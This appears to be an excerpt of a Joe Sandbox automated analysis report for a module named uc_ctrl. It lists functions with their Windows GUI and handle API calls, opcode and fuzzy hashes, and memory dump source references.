Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: 64c6a61d53de545232fa18db7ad5d8a4781a0e2ca1da03e9426b10959441bb7b
Instruction ID: 390b0703c5ff801b669e121622347dd9269b320fc6fbaef23fff86e6b2134e42
Opcode Fuzzy Hash: 64c6a61d53de545232fa18db7ad5d8a4781a0e2ca1da03e9426b10959441bb7b
Instruction Fuzzy Hash: E4412C71A1224AEFCF00CFA8C984ADEBBF5FF09305F100469E945EB644D731AA45CB61

Function 6CB46F21 Relevance: 7.6, APIs: 5, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB46F28
__Init_thread_footer.LIBCMT ref: 6CB46F7B
GetCursorPos.USER32(?), ref: 6CB46FBC
ScreenToClient.USER32(?,?), ref: 6CB46FC9
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 6CB4709E

Part of subcall function 6CC514D2: __onexit.LIBCMT ref: 6CC514D8

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClientCursorH_prolog3Init_thread_footerMessageScreenSend__onexit
String ID:
API String ID: 573583934-0
Opcode ID: 465d6f4092ba64a320c9040bac271ea5266ffbde932a4e8b4854b6691882cbe5
Instruction ID: b2220efd71503c00cebbd01e522858786fa8ae10a2870c451d29319a1b8278dd
Opcode Fuzzy Hash: 465d6f4092ba64a320c9040bac271ea5266ffbde932a4e8b4854b6691882cbe5
Instruction Fuzzy Hash: 7D41D070A092429FDF05CFA4C494BAEB3B9FB04359F108229E451ABB94DB74E969CF41

Function 6CB3EDA2 Relevance: 7.6, APIs: 5, Instructions: 120windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB3EDA9
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6CB3EDC3
GetWindowRect.USER32(?,?), ref: 6CB3EE67
ReleaseCapture.USER32 ref: 6CB3EF47

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CaptureH_prolog3_MessageRectReleaseSendWindow
String ID:
API String ID: 1034054131-0
Opcode ID: d5b3784d6ae4dc3d3370400d8030fa4c4085f27eb1b0eb1efd4e30116db0bc44
Instruction ID: d5e6dfede23832bb68ba5801b3f2ca5bc3db9aedc727073d564a58cab917e625
Opcode Fuzzy Hash: d5b3784d6ae4dc3d3370400d8030fa4c4085f27eb1b0eb1efd4e30116db0bc44
Instruction Fuzzy Hash: AC515B71A062659BDF418F54C884BED3BB9EF08314F1810BAEC0C9B699CB786805CFA1

Function 6CB6A0A8 Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(?,00007904), ref: 6CB6A0E0
LoadCursorW.USER32(?,00007905), ref: 6CB6A113
LoadCursorW.USER32(00000000,00007F86), ref: 6CB6A13E
CreatePen.GDI32(00000000,00000001,?), ref: 6CB6A1B6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CursorLoad$Create
String ID:
API String ID: 1516763891-0
Opcode ID: 48f50f7a44ebc108481bc028cf05f476f3c6bf9c3bda2a62bb6deee116b9b563
Instruction ID: ee1ce54af991314e1a753ee36988166094d4ac73f17bb3bd958cdaf979014948
Opcode Fuzzy Hash: 48f50f7a44ebc108481bc028cf05f476f3c6bf9c3bda2a62bb6deee116b9b563
Instruction Fuzzy Hash: 92311775A402A09BDF11ABB5C848FEE37A9AF05258F150175E909DBF91EF34D804CE32

Function 6CB40BF7 Relevance: 7.6, APIs: 5, Instructions: 92windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB40C01
IsWindow.USER32(?), ref: 6CB40C20

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Part of subcall function 6CB4054A: IsWindow.USER32(?), ref: 6CB40555
Part of subcall function 6CB4054A: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6CB40576
Part of subcall function 6CB4054A: SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6CB4058A
Part of subcall function 6CB4054A: SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6CB405B7
Part of subcall function 6CB4054A: SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 6CB405CB

Part of subcall function 6CB9698E: __EH_prolog3.LIBCMT ref: 6CB96995

Part of subcall function 6CB947BA: SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 6CB947E4

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB9480E: SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 6CB94838
Part of subcall function 6CB9480E: SendMessageW.USER32(00000000,00000150,?,00000000), ref: 6CB94859

SendMessageW.USER32(?,00000158,000000FF,?), ref: 6CB40CB7
SendMessageW.USER32(?,00000143,00000000,?), ref: 6CB40CF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 6CB40D05

Part of subcall function 6CB40414: __EH_prolog3.LIBCMT ref: 6CB4041B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3$Window$Exception@8H_prolog3_Throw
String ID:
API String ID: 1839825105-0
Opcode ID: 24fee9f70db6e801de99f54fc5fec0999ea9fe5ff259de489173d7bda5ed4237
Instruction ID: b9e20013d639aab805bc3686b3f3bfeae915d741b870712a0293045560a9a524
Opcode Fuzzy Hash: 24fee9f70db6e801de99f54fc5fec0999ea9fe5ff259de489173d7bda5ed4237
Instruction Fuzzy Hash: E531E531A082DCABDF159F74CC55BDE7B70BF16304F0045A8E659A2791DB708E88DB21

Function 6CB3C0D4 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB3C0F3
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 6CB3C17F
GetParent.USER32(?), ref: 6CB3C18F
GetWindowLongW.USER32(?,000000F4), ref: 6CB3C1AA
SendMessageW.USER32(00000000,00000111), ref: 6CB3C1BA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageParentSend$LongWindow
String ID:
API String ID: 2933145521-0
Opcode ID: 65d916452b8f22ad1ad732d1438acf20adfed305ea3871b7a614cc97f45b0a28
Instruction ID: 08d2513daa41862391a96660b71f935086f22eb3968dd1bee81c63710bcb918b
Opcode Fuzzy Hash: 65d916452b8f22ad1ad732d1438acf20adfed305ea3871b7a614cc97f45b0a28
Instruction Fuzzy Hash: A3210A72A41AB0AFDF117BB58C4896E7AB4FB49354F204729F85ED3A50EB34C800E711

Function 6CB40B01 Relevance: 7.6, APIs: 5, Instructions: 84keyboardwindowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB40B36
GetKeyState.USER32(00000012), ref: 6CB40B64
GetKeyState.USER32(00000011), ref: 6CB40B71
SendMessageW.USER32(?,00000157,00000000,00000000), ref: 6CB40B86
SendMessageW.USER32(?,0000014F,00000001,00000000), ref: 6CB40B9B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSendState$Parent
String ID:
API String ID: 1284845784-0
Opcode ID: 24c6fe9ad30c9c06eab2ea96543be53431677d7017ca6fb495e0a50a4a944661
Instruction ID: 3ee42cf3e080d220752bb6794f1c486a16454d5b23490f5aa22dfc4dccde3056
Opcode Fuzzy Hash: 24c6fe9ad30c9c06eab2ea96543be53431677d7017ca6fb495e0a50a4a944661
Instruction Fuzzy Hash: A121377130D6C5ABEF041AB59C08ABE76BCFF7274DB00812DE55A96D48DB60D800E6A9

Function 6CB3ACCC Relevance: 7.6, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB3ACED
GetWindow.USER32(?,00000005), ref: 6CB3AD25
GetWindowRect.USER32(?,00000000), ref: 6CB3AD51

Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2618D
Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2619A

OffsetRect.USER32(00000000,00000000,?), ref: 6CB3AD69

Part of subcall function 6CB2D922: SetWindowPos.USER32(?,?,00000015,000000FF,000000FF,?,?,?,?,6CB27FE1,00000000,?,?,000000FF,000000FF,00000015), ref: 6CB2D94A

GetWindow.USER32(?,00000002), ref: 6CB3AD89

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$ClientRectScreen$OffsetParent
String ID:
API String ID: 622029514-0
Opcode ID: f71dbc171739b7d588e6349dae32721e70e3f0a9721d151cdce2cc9ba708b286
Instruction ID: 0d02a258a0bb0d95ea25d92ca1509eb909bbf40d7c3e9317f88076d91a7ea71b
Opcode Fuzzy Hash: f71dbc171739b7d588e6349dae32721e70e3f0a9721d151cdce2cc9ba708b286
Instruction Fuzzy Hash: 7C218372A1121AABDF129FA4CC48FBFBBB8FF09325F100559E518A7690DB35D904CB60

Function 6CB2B81E Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB2B828
GetTopWindow.USER32(?), ref: 6CB2B855
GetDlgCtrlID.USER32(00000000), ref: 6CB2B867
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6CB2B8C2
GetWindow.USER32(00000000,00000002), ref: 6CB2B904

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: 5363ca38597f36886291559217c3cde6a55d273f03da8e2801b025ec161acba3
Instruction ID: d427c13c7af982c2532c7739dca1db2bd008fb9a796237a91395ba64981fe566
Opcode Fuzzy Hash: 5363ca38597f36886291559217c3cde6a55d273f03da8e2801b025ec161acba3
Instruction Fuzzy Hash: 4D21D1B1905298AADF119B61CD44FFE7A7AFF42308F100159F81EE6B50EF388A45CA52

Function 6CB48A7B Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 6CB25025: __EH_prolog3.LIBCMT ref: 6CB2502C
Part of subcall function 6CB25025: GetDC.USER32(00000000), ref: 6CB25058

IsRectEmpty.USER32(?), ref: 6CB48AA3
InvertRect.USER32(?,?), ref: 6CB48AB1
SetRectEmpty.USER32(?), ref: 6CB48AC3
GetClientRect.USER32(?,?), ref: 6CB48AE0
InvertRect.USER32(?,?), ref: 6CB48B30

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$EmptyInvert$ClientH_prolog3
String ID:
API String ID: 1656078942-0
Opcode ID: 067049be33c05ed4831aef66d69fed983304c5172323d54386dc0663bb437b81
Instruction ID: 1a58e283a916531afb20a91697e0f449961ca5a145b777ff6096ab7e42af6ea6
Opcode Fuzzy Hash: 067049be33c05ed4831aef66d69fed983304c5172323d54386dc0663bb437b81
Instruction Fuzzy Hash: DB215171A046099FCB05CFB8C8849EFBBF9FF4A304F14416AE505E7210E7729A49DB90

Function 6CB6EE0E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB6EE15
GetWindowRect.USER32(00000000,00000000), ref: 6CB6EE62
CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6CB6EE8C
SetWindowRgn.USER32(00000000,?,00000000), ref: 6CB6EEA2
SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6CB6EEBA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_Round
String ID:
API String ID: 2502471913-0
Opcode ID: ec9778f7012283a9cf7ab409f4c6d0f36de33c3ea6acc00d25fb7cdadfe42160
Instruction ID: 71e2eee5b9bc1b145dd0df963a9d6eef57efc0178ad50581f5011bc010fdf598
Opcode Fuzzy Hash: ec9778f7012283a9cf7ab409f4c6d0f36de33c3ea6acc00d25fb7cdadfe42160
Instruction Fuzzy Hash: B22136B0A01249AFDF058FA8C984AEEBB79FF08358F141029E515A3A50EB349D15CFA4

Function 6CB48386 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4838D
IsWindow.USER32(?), ref: 6CB483B4
InflateRect.USER32(?,00000000,000000FF), ref: 6CB483D0
InvalidateRect.USER32(?,?,00000001), ref: 6CB483E5
UpdateWindow.USER32(?), ref: 6CB483F4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
String ID:
API String ID: 2146894351-0
Opcode ID: ce87869172736cf2c5ba7320e8cc11bcbfa1ec016d64545f628cd1fbb23a7134
Instruction ID: 6526b1eab9d89db982fbd1b28d1dfe34d271f6e45bba2fde065ee9351682f514
Opcode Fuzzy Hash: ce87869172736cf2c5ba7320e8cc11bcbfa1ec016d64545f628cd1fbb23a7134
Instruction Fuzzy Hash: 201126B16051159FDF00DF68C994FEA7BB6FF09304F4441A8E909AF2A5DB75E908CB60

Function 6CB4D4D7 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 6CB4D500
CreateFontIndirectW.GDI32(?), ref: 6CB4D517
IsWindow.USER32(?), ref: 6CB4D531
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB4D54F
UpdateWindow.USER32(?), ref: 6CB4D558

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$CreateFontIndirectInvalidateObjectRectUpdate
String ID:
API String ID: 1602852816-0
Opcode ID: c5df12776a799daa8aab988a6af282fa2ead8239f20a6eb0c512fd3e6df14390
Instruction ID: c0edd803b272b1545cd21546e32f9fac8e3c2de0ef746067747552635eba5471
Opcode Fuzzy Hash: c5df12776a799daa8aab988a6af282fa2ead8239f20a6eb0c512fd3e6df14390
Instruction Fuzzy Hash: A111C232701618ABDF059F78CD08ABEBBB9FF49714F044019EA0997A48DF34ED199B81

Function 6CB2E3BA Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB2E3C1
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000008), ref: 6CB2E3F5
GetCurrentProcess.KERNEL32(?,00000000), ref: 6CB2E3FF
DuplicateHandle.KERNEL32(00000000), ref: 6CB2E406
GetLastError.KERNEL32(?), ref: 6CB2E429

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorH_prolog3HandleLast
String ID:
API String ID: 2082106130-0
Opcode ID: 1e21b8678bda1ef1baabdcb9dd6a19961263c30b7ac4a75e692e3a55595ec706
